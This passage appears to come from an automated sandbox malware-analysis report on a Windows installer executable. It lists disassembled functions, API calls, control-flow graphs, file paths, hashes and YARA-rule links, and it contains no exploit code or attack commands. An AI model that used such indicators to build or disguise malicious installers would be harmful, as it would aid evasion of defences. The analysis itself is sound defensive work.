                                      • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 0040659A
                                      • FindClose.KERNEL32(00000000), ref: 004065A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: 8gB
                                      • API String ID: 2295610775-1733800166
                                      • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                      • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                      • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                      • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                      Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                      Strings
                                      • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene, xrefs: 004021BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CreateInstance
                                      • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene
                                      • API String ID: 542301482-2332916965
                                      • Opcode ID: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                      • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                      • Opcode Fuzzy Hash: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                      • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                      Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                      • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                      • Opcode Fuzzy Hash: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                      • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
                                      Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 195 403d2c-403d35 191->195 193 403eb9-403ece 192->193 194 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 192->194 199 403ed0-403ed3 193->199 200 403f0e-403f13 call 40422d 193->200 194->193 196 403d37-403d44 SetWindowPos 195->196 197 403d4a-403d4d 195->197 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 212 403f18-403f33 200->212 207 403d89-403d8c 201->207 208 403d6f-403d84 DestroyWindow 201->208 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 211 4041ae 205->211 218 403d8e-403d9a SetWindowLongW 207->218 219 403d9f-403da5 207->219 215 40418b-404191 208->215 217 4041b0-4041b7 211->217 213 403f35-403f37 call 40140b 212->213 214 403f3c-403f42 212->214 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->211 222 404193-404199 215->222 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->211 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                      • ShowWindow.USER32(?), ref: 00403D61
                                      • DestroyWindow.USER32 ref: 00403D75
                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                      • GetDlgItem.USER32(?,?), ref: 00403DB2
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                      • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                      • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                      • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                      • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                      • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                      • EnableWindow.USER32(?,?), ref: 00403FE4
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                      • EnableMenuItem.USER32(00000000), ref: 00404001
                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                      • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                      • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                      • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID: 6B
                                      • API String ID: 3282139019-4127139157
                                      • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                      • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                      • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                      • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                      Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 316 403a1a-403a42 call 40611a 314->316 316->313 322 403a44-403a48 316->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 353 403c03-403c05 349->353 356 403c07-403c0d 353->356 357 403c1f-403c21 call 40140b 353->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 366 403bf2-403bfb call 4038aa 361->366 362->338 366->332
                                      APIs
                                        • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                        • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                      • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000), ref: 004039DB
                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea), ref: 00403AC2
                                        • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                      • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                      • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                      • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                      • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                      • API String ID: 1975747703-2377567919
                                      • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                      • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                      • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                      • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                      Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 394 4030a0-4030a8 call 402e5d 387->394 395 402f7e-402f85 387->395 392 40304b-403063 call 4032f5 call 4032df 388->392 393 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->393 389->374 392->389 416 403065-40306b 392->416 393->389 420 4030aa-4030bb 393->420 394->389 398 403001-403005 395->398 399 402f87-402f9b call 405cf9 395->399 406 403007-40300e call 402e5d 398->406 407 40300f-403015 398->407 399->407 418 402f9d-402fa4 399->418 406->407 411 403024-40302e 407->411 412 403017-403021 call 406719 407->412 411->384 419 403034 411->419 412->411 416->389 416->393 418->407 422 402fa6-402fad 418->422 419->381 423 4030c3-4030c8 420->423 424 4030bd 420->424 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 430 402fc1-402fe1 427->430 431 4030f1 428->431 430->389 432 402fe7-402feb 430->432 431->374 433 402ff3-402ffb 432->433 434 402fed-402ff1 432->434 433->407 435 402ffd-402fff 433->435 434->419 434->433 435->407
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402ED2
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SDWLLRJcsY.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                        • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                        • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SDWLLRJcsY.exe,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SDWLLRJcsY.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 4283519449-521245839
                                      • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                      • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                      • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                      • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                      Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 441 4062bb-4062c2 439->441 442 4064c6-4064d1 440->442 443 4062c7-4062d4 440->443 441->440 445 4064d3-4064d7 call 40624c 442->445 446 4064dc-4064dd 442->446 443->442 444 4062da-4062e6 443->444 447 4064a7 444->447 448 4062ec-40632a 444->448 445->446 452 4064b5-4064b8 447->452 453 4064a9-4064b3 447->453 450 406330-40633b 448->450 451 40644a-40644e 448->451 454 406354 450->454 455 40633d-406342 450->455 456 406450-406456 451->456 457 406481-406485 451->457 452->440 453->440 463 40635b-406362 454->463 455->454 460 406344-406347 455->460 461 406466-406472 call 40624c 456->461 462 406458-406464 call 406193 456->462 458 406494-4064a5 lstrlenW 457->458 459 406487-40648f call 40626e 457->459 458->440 459->458 460->454 465 406349-40634c 460->465 470 406477-40647d 461->470 462->470 467 406364-406366 463->467 468 406367-406369 463->468 465->454 471 40634e-406352 465->471 467->468 473 4063a4-4063a7 468->473 474 40636b-406389 call 40611a 468->474 470->458 476 40647f 470->476 471->463 477 4063b7-4063ba 473->477 478 4063a9-4063b5 GetSystemDirectoryW 473->478 479 40638e-406392 474->479 480 406442-406448 call 4064e0 476->480 482 406425-406427 477->482 483 4063bc-4063ca GetWindowsDirectoryW 477->483 481 406429-40642d 478->481 484 406432-406435 479->484 485 406398-40639f call 40626e 479->485 480->458 481->480 487 40642f 481->487 482->481 486 4063cc-4063d6 482->486 483->482 484->480 490 406437-40643d lstrcatW 484->490 485->481 492 4063f0-406406 SHGetSpecialFolderLocation 486->492 493 4063d8-4063db 486->493 487->484 490->480 496 406421 492->496 497 406408-40641f SHGetPathFromIDListW CoTaskMemFree 492->497 493->492 495 4063dd-4063e4 493->495 498 4063ec-4063ee 495->498 496->482 497->481 497->496 498->481 498->492
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063AF
                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063C2
                                      • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063FE
                                      • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 0040640C
                                      • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 00406495
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
